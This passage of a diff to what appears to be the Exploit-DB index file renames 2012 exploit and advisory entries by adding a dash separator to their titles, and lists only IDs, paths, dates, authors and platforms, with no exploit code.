Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 18350,platforms/php/webapps/18350.txt,"WordPress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 -18351,platforms/netware/dos/18351.txt,"Novell Netware XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 -18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 +18351,platforms/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 +18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 18355,platforms/php/webapps/18355.txt,"WordPress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 @@ -15919,10 +15919,10 @@ id,file,description,date,author,platform,type,port 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)",2012-01-14,"Marco Batista",php,webapps,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 -18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,Metasploit,windows,remote,0 +18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution",2012-01-17,Metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",2012-01-14,Metasploit,windows,remote,0 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption",2012-01-14,Metasploit,windows,local,0 -18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,Metasploit,windows,remote,0 +18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (2)",2012-01-17,Metasploit,osx,remote,0 @@ -15931,18 +15931,18 @@ id,file,description,date,author,platform,type,port 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection",2012-06-03,Metasploit,php,webapps,0 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 -18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,Metasploit,windows,remote,0 +18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,Metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0 18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 -18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,Metasploit,windows,remote,0 +18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - ov.dll _OVBuildPath Buffer Overflow",2012-01-20,Metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 < 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 -18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 +18393,platforms/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 @@ -15967,13 +15967,13 @@ id,file,description,date,author,platform,type,port 18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8/ 2.9 - XSS/SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 -18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 +18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 18424,platforms/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit)",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQLi",2012-01-30,"Craig Freyman",multiple,webapps,0 -18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 +18431,platforms/multiple/webapps/18431.txt,"Ajax Upload - Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 18432,platforms/php/webapps/18432.txt,"phux Download Manager Blind SQL Injection",2012-01-30,"Red Security TEAM",php,webapps,0 18435,platforms/php/webapps/18435.txt,"phpShowtime Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 - 1.8.3p1 Format String",2012-01-31,joernchen,linux,dos,0 @@ -15988,8 +15988,8 @@ id,file,description,date,author,platform,type,port 18444,platforms/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0 18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail Cross-Site Scripting",2012-01-13,"Sajjad Pourali",asp,webapps,0 -18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,Metasploit,windows,remote,0 -18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,Metasploit,windows,remote,0 +18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol - SNMP NetDBServer.exe Opcode 0x57",2012-02-02,Metasploit,windows,remote,0 +18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger - DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,Metasploit,windows,remote,0 18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent XSS Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 18452,platforms/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 @@ -16000,7 +16000,7 @@ id,file,description,date,author,platform,type,port 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (64-bit) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 -18463,platforms/windows/dos/18463.html,"PDF Viewer Component ActiveX DoS",2012-02-05,"Senator of Pirates",windows,dos,0 +18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX DoS",2012-02-05,"Senator of Pirates",windows,dos,0 18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - (base_qry_main.php t_view) SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 @@ -16024,7 +16024,7 @@ id,file,description,date,author,platform,type,port 18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 -18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 +18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 @@ -16044,7 +16044,7 @@ id,file,description,date,author,platform,type,port 18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 -18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 +18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,Metasploit,windows,local,0 @@ -16075,11 +16075,11 @@ id,file,description,date,author,platform,type,port 18545,platforms/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18546,platforms/windows/dos/18546.txt,"Novell Groupwise Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 -18548,platforms/windows/local/18548.rb,"VLC Media Player RealText Subtitle Overflow",2012-03-02,Metasploit,windows,local,0 +18548,platforms/windows/local/18548.rb,"VLC Media Player - RealText Subtitle Overflow",2012-03-02,Metasploit,windows,local,0 18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 -18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,Metasploit,php,remote,0 +18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 - eval() Remote Command Execution",2012-03-07,Metasploit,php,remote,0 18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 -18552,platforms/windows/dos/18552.pl,"Passport PC To Host Malformed .zws file Memory Corruption",2012-03-03,Silent_Dream,windows,dos,0 +18552,platforms/windows/dos/18552.pl,"Passport PC To Host - Malformed .zws file Memory Corruption",2012-03-03,Silent_Dream,windows,dos,0 18553,platforms/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL injection",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 @@ -16117,7 +16117,7 @@ id,file,description,date,author,platform,type,port 18599,platforms/php/webapps/18599.txt,"asaanCart - XSS / LFI",2012-03-14,"Number 7",php,webapps,0 18602,platforms/windows/dos/18602.txt,"Epson EventManager 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 18603,platforms/windows/webapps/18603.txt,"TVersity 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 -18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,Metasploit,windows,remote,0 +18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 - HTTP Server Buffer Overflow",2012-03-15,Metasploit,windows,remote,0 18605,platforms/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 @@ -16130,9 +16130,9 @@ id,file,description,date,author,platform,type,port 18613,platforms/php/webapps/18613.txt,"ASP Classifieds SQL Injection",2012-03-17,r45c4l,php,webapps,0 18614,platforms/php/webapps/18614.txt,"PRE PRINTING STUDIO SQL Injection",2012-03-17,r45c4l,php,webapps,0 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 -18621,platforms/windows/remote/18621.txt,"Dell Webcam Software Bundled ActiveX Remote Buffer Overflow",2012-03-19,rgod,windows,remote,0 +18621,platforms/windows/remote/18621.txt,"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow",2012-03-19,rgod,windows,remote,0 18622,platforms/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Code Execution",2012-03-19,rgod,windows,remote,0 -18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0 +18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal",2012-03-19,rgod,jsp,webapps,0 @@ -16142,13 +16142,13 @@ id,file,description,date,author,platform,type,port 18631,platforms/php/webapps/18631.txt,"OneForum - (topic.php) SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - .Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 -18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage",2012-03-21,Metasploit,windows,remote,0 +18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage",2012-03-21,Metasploit,windows,remote,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - CSRF",2012-03-21,iqzer0,hardware,webapps,0 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / XSS",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 -18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 +18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0 @@ -16164,7 +16164,7 @@ id,file,description,date,author,platform,type,port 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 -18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow'",2012-03-24,Metasploit,windows,remote,0 +18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 - FTP USER Command Buffer Overflow'",2012-03-24,Metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 @@ -16176,9 +16176,9 @@ id,file,description,date,author,platform,type,port 18668,platforms/php/webapps/18668.txt,"vBshop - Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' DoS PoC-Exploit",2012-03-28,"Stefan Schurtz",windows,dos,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 -18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 +18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 -18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 +18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam - ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation",2012-03-30,Metasploit,multiple,remote,0 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 @@ -16199,14 +16199,14 @@ id,file,description,date,author,platform,type,port 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 -18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,Metasploit,windows,remote,0 +18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution",2012-04-08,Metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps,0 18718,platforms/windows/remote/18718.txt,"distinct tftp server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - CSRF Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm / .mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 18722,platforms/cgi/webapps/18722.txt,"ZTE - Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 -18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 +18723,platforms/multiple/remote/18723.rb,"Snort 2 - DCE/RPC preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Auth OS Command Injection",2012-04-09,Metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 @@ -16220,12 +16220,12 @@ id,file,description,date,author,platform,type,port 18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilites",2012-04-13,shpendk,php,webapps,0 -18738,platforms/php/remote/18738.rb,"V-CMS PHP File Upload and Execute",2012-04-14,Metasploit,php,remote,0 +18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execute",2012-04-14,Metasploit,php,remote,0 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 -18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 +18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,Metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,Metasploit,windows,local,0 @@ -16239,7 +16239,7 @@ id,file,description,date,author,platform,type,port 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - (.mp4) Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,Metasploit,windows,remote,0 -18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,Metasploit,windows,local,0 +18760,platforms/windows/local/18760.rb,"xRadio 0.95b - Buffer Overflow",2012-04-20,Metasploit,windows,local,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution",2012-04-20,Metasploit,linux,remote,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 @@ -16258,7 +16258,7 @@ id,file,description,date,author,platform,type,port 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,Metasploit,windows,local,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 -18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 +18783,platforms/linux/local/18783.txt,"mount.cifs chdir() - Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 